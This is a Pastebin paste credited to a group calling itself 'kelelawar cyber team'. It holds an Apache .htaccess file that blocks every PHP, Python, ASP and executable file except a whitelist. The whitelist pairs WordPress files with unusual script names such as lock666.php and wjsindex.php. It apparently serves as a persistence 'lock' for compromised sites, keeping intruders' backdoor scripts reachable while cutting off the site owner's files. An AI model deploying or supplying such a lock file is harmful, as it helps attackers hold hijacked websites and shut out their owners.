kelelawar_cyber_team

.Htacces Banned

Jun 26th, 2021 (edited)
546
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. by: kelelawar cyber team
  2. =========================
  3. <FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp)$">
  4. Order allow,deny
  5. Deny from all
  6. </FilesMatch>
  7. <FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|template-load.php)$">
  8. Order allow,deny
  9. Allow from all
  10. </FilesMatch>
  11. <IfModule mod_rewrite.c>
  12. RewriteEngine On
  13. RewriteBase /
  14. RewriteRule ^index.php$ - [L]
  15. RewriteCond %{REQUEST_FILENAME} !-f
  16. RewriteCond %{REQUEST_FILENAME} !-d
  17. RewriteRule . index.php [L]
  18. </IfModule>
Add Comment
Please, Sign In to add comment